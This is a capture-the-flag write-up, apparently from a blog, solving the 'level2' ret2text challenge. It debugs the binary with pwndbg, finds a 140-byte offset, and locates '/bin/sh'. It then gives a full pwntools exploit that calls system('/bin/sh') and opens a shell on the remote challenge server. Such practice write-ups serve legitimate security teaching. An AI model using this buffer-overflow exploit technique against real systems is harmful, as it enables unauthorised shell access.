Solving challenges from scratch: reversing ret2text level2

2024-01-21 10:36


1. Challenge information

https://adworld.xctf.org.cn/challenges/list

2. Solution analysis

2.1 IDA shows that the program calls the system function to print its output


2.2 gdb cannot debug the program (it follows the child spawned by system)

root@pwn_test1604:/ctf/work/4# gdb ./level2 
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 171 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from ./level2...(no debugging symbols found)...done.
pwndbg> r
Starting program: /ctf/work/4/level2 
[New process 336]
process 336 is executing new program: /bin/dash
Input:
[Inferior 2 (process 336) exited normally]
pwndbg> 

2.3 Fixing the gdb debugging problem

pwndbg> set follow-fork-mode parent

root@pwn_test1604:/ctf/work/4# gdb ./level2 
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 171 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)
Reading symbols from ./level2...(no debugging symbols found)...done.
pwndbg> set follow-fork-mode parent
pwndbg> r
Starting program: /ctf/work/4/level2 
Input:

pwndbg> cyclic 400
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaad


2.4 Obtaining the EIP value at the crash

pwndbg> r
Starting program: /ctf/work/4/level2 
Input:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadProgram received signal SIGSEGV, Segmentation fault.
0x6261616b in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────[ REGISTERS ]───────────────────────────────────────
 EAX  0x100
 EBX  0x0
 ECX  0xffffd680 ◂— 0x61616161 ('aaaa')
 EDX  0x100
 EDI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 ESI  0xf7fc5000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b1db0
 EBP  0x6261616a ('jaab')
 ESP  0xffffd710 ◂— 'laabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
 EIP  0x6261616b ('kaab')
────────────────────────────────────────[ DISASM ]─────────────────────────────────────────
Invalid address 0x6261616b
─────────────────────────────────────────[ STACK ]─────────────────────────────────────────
00:0000│ esp  0xffffd710 ◂— 'laabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
01:0004│      0xffffd714 ◂— 'maabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
02:0008│      0xffffd718 ◂— 'naaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
03:000c│      0xffffd71c ◂— 'oaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
04:0010│      0xffffd720 ◂— 'paabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
05:0014│      0xffffd724 ◂— 'qaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
06:0018│      0xffffd728 ◂— 'raabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
07:001c│      0xffffd72c ◂— 'saabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
───────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────
 ► f 0  6261616b
   f 1  6261616c
   f 2  6261616d
   f 3  6261616e
   f 4  6261616f
   f 5  62616170
   f 6  62616171
   f 7  62616172
   f 8  62616173
   f 9  62616174
   f 10 62616175
Program received signal SIGSEGV (fault address 0x6261616b)
pwndbg> oaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaad
Undefined command: "oaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaad".  Try "help".
pwndbg> 

2.5 Looking up the offset that corresponds to kaab

pwndbg> cyclic -l kaab
140
pwndbg> 
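To make the offset lookup in 2.4 and 2.5 reproducible without pwndbg, here is an added example (not part of the original writeup) that builds the same de Bruijn pattern pwntools' cyclic command uses and maps a crashing EIP value back to its offset; the function names are my own.

```python
# Added example, not from the original writeup: reimplements what
# `cyclic 400` and `cyclic -l kaab` do (same de Bruijn construction as
# pwntools: alphabet a..z, unique 4-byte windows).  Names are my own.
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"
N = 4  # every 4-byte window occurs once, so one EIP value maps to one offset


def de_bruijn(alphabet=ALPHABET, n=N):
    """Yield the de Bruijn sequence B(k, n) byte by byte (FKM algorithm)."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]:a[j] + 1]
        else:
            a[t] = a[t - p]
            for c in db(t + 1, p):
                yield c
            for j in range(a[t - p] + 1, k):
                a[t] = j
                for c in db(t + 1, t):
                    yield c

    return db(1, 1)


def cyclic(length):
    """Like `cyclic <length>`: the first `length` bytes of the pattern."""
    out = bytearray()
    for c in de_bruijn():
        if len(out) == length:
            break
        out += c
    return bytes(out)


def cyclic_find(subseq, max_len=4096):
    """Like `cyclic -l <subseq>`: offset of a 4-byte window, or -1 if absent."""
    return cyclic(max_len).find(subseq)


def offset_from_eip(eip):
    """Map a crashing 32-bit EIP to its offset: the register holds the four
    pattern bytes in little-endian order (0x6261616b is 'kaab' in memory)."""
    return cyclic_find(struct.pack("<I", eip))
```

The result 140 is the distance from the start of the buffer to the saved return address, i.e. the buffer plus the saved EBP that sits just below it.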

2.6 Inspecting the strings in the binary

Method 1: view them in IDA


Method 2: use the Linux strings command and ROPgadget


root@pwn_test1604:/ctf/work/4# strings ./level2
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
read
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh 
t$,U
[^_]
echo Input:
echo 'Hello World!'
;*2$"
/bin/sh
GCC: (Ubuntu 5.2.1-22ubuntu2) 5.2.1 20151010
GCC: (Ubuntu 4.9.2-10ubuntu11) 4.9.2
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got
.got.plt
.data
.bss
.comment
crtstuff.c
__JCR_LIST__
deregister_tm_clones
register_tm_clones
__do_global_dtors_aux
completed.7181
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
level2.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
read@@GLIBC_2.0
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
data_start
_edata
_fini
vulnerable_function
__data_start
system@@GLIBC_2.0
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_start_main@@GLIBC_2.0
__libc_csu_init
_end
_start
_fp_hw
__bss_start
main
hint
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
_init
root@pwn_test1604:/ctf/work/4# ROPgadget --binary ./level2 --string "/bin/sh"
Strings information
============================================================
0x0804a024 : /bin/sh
root@pwn_test1604:/ctf/work/4# 

3. Exploit script

3.1 The only part that needs to be changed

BIN   ='./level2'
HOST  ='pwn2.jarvisoj.com'
PORT  =9878

def exploit(p):
    p.recv()                                  # consume the "Input:" prompt
    pl = 140*'a'+p32(elf.plt['system'])       # 140 bytes of padding (see 2.5), then system@plt
    pl += 'aaaa'                              # fake return address for system
    pl += p32(0x0804a024)                     # address of "/bin/sh" found in 2.6
    p.sendline(pl)
    p.interactive()
    return

3.2 Full script

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 pwntools script (the remote run below shows python2.7); str/bytes
# concatenation with p32() relies on that.
from pwn import *
import sys

context.terminal = ["tmux", "sp", "-h"]   # gdb.attach opens a horizontal tmux split
context.log_level = 'debug'

DEBUG = 1
LOCAL = True
BIN   = './level2'
HOST  = 'pwn2.jarvisoj.com'
PORT  = 9878


def get_base_address(proc):
    # First mapping in /proc/<pid>/maps is the load base of the binary
    return int(open("/proc/{}/maps".format(proc.pid), 'rb').readlines()[0].split('-')[0], 16)


def debug(bps, _s):
    # Attach gdb to the running process with breakpoints relative to the load base
    script = "handle SIGALRM ignore\n"
    PIE = get_base_address(p)
    script += "set $_base = 0x{:x}\n".format(PIE)
    for bp in bps:
        script += "b *0x%x\n" % (PIE + bp)
    script += _s
    gdb.attach(p, gdbscript=script)


# pwn,caidan,leak,libc
# recv recvuntil send sendline sendlineafter sendafter
def exploit(p):
    p.recv()                                  # consume the "Input:" prompt
    pl = 140*'a' + p32(elf.plt['system'])     # padding up to the return address, then system@plt
    pl += 'aaaa'                              # fake return address for system
    pl += p32(0x0804a024)                     # address of "/bin/sh" in the binary
    p.sendline(pl)
    p.interactive()
    return


if __name__ == "__main__":
    elf = ELF(BIN)
    if len(sys.argv) > 1:
        LOCAL = False
        p = remote(HOST, PORT)
        exploit(p)
    else:
        LOCAL = True
        p = process(BIN)
        log.info('PID: ' + str(proc.pidof(p)[0]))
        # pause
        if DEBUG:
            debug([], "")
        exploit(p)

3.3 Running level2 locally

tmux must be started first.

Left tmux pane (the exploit script):

root@pwn_test1604:/ctf/work/4# python level2.py
[DEBUG] PLT 0x8048310 read
[DEBUG] PLT 0x8048310 read
[DEBUG] PLT 0x8048320 system
[DEBUG] PLT 0x8048330 __gmon_start__
[DEBUG] PLT 0x8048340 __libc_start_main
[*] '/ctf/work/4/level2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Starting local process './level2': pid 476
[*] PID: 476
[DEBUG] Wrote gdb script to '/tmp/pwnKbKDIl.gdb'
    file ./level2
    handle SIGALRM ignore

Right tmux pane (gdb attached to the process by the debug() helper):

 EIP  0xf7f16589 (__kernel_vsyscall+9) ◂— pop    ebp
───────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────
 ► 0xf7f16589 <__kernel_vsyscall+9>     pop    ebp
   0xf7f1658a <__kernel_vsyscall+10>    pop    edx
   0xf7f1658b <__kernel_vsyscall+11>    pop    ecx
   0xf7f1658c <__kernel_vsyscall+12>    ret
    ↓
   0xf7e27b23 <__read_nocancel+25>      pop    ebx
   0xf7e27b24 <__read_nocancel+26>      cmp    eax, 0xfffff001
   0xf7e27b29 <__read_nocancel+31>      jae    __syscall_error <0xf7d6a730>
    ↓
   0xf7d6a730 <__syscall_error>         call   __x86.get_pc_thunk.dx <0xf7e71b5d>
   0xf7d6a735 <__syscall_error+5>       add    edx, 0x1998cb
   0xf7d6a73b <__syscall_error+11>      mov    ecx, dword ptr gs:[0]
   0xf7d6a742 <__syscall_error+18>      neg    eax


3.4 Running against the remote target

root@pwn_test1604:/ctf/work/4# python level2.py 1
[DEBUG] PLT 0x8048310 read
[DEBUG] PLT 0x8048320 system
[DEBUG] PLT 0x8048330 __gmon_start__
[DEBUG] PLT 0x8048340 __libc_start_main
[*] '/ctf/work/4/level2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[-] Opening connection to pwn2.jarvisoj.com on port 9878: Failed
Traceback (most recent call last):
  File "level2.py", line 50, in <module>
    p = remote(HOST, PORT)
  File "/usr/local/lib/python2.7/dist-packages/pwnlib/tubes/remote.py", line 72, in __init__
    self.sock   = self._connect(fam, typ)
  File "/usr/local/lib/python2.7/dist-packages/pwnlib/tubes/remote.py", line 89, in _connect
    for res in socket.getaddrinfo(self.rhost, self.rport, fam, typ, 0, socket.AI_PASSIVE):
socket.gaierror: [Errno -3] Temporary failure in name resolution
root@pwn_test1604:/ctf/work/4# python level2.py 1
[DEBUG] PLT 0x8048310 read
[DEBUG] PLT 0x8048320 system
[DEBUG] PLT 0x8048330 __gmon_start__
[DEBUG] PLT 0x8048340 __libc_start_main
[*] '/ctf/work/4/level2'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Opening connection to pwn2.jarvisoj.com on port 9878: Done
[DEBUG] Received 0x7 bytes:
    'Input:\n'
[DEBUG] Sent 0x99 bytes:
    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    00000080  61 61 61 61  61 61 61 61  61 61 61 61  20 83 04 08  │aaaa│aaaa│aaaa│ ···│
    00000090  61 61 61 61  24 a0 04 08  0a                        │aaaa│$···│·│
    00000099
[*] Switching to interactive mode
$ ls
[DEBUG] Sent 0x3 bytes:
    'ls\n'
[DEBUG] Received 0xc bytes:
    'flag\n'
    'level2\n'
flag
level2

http://www.chinasem.cn/article/629242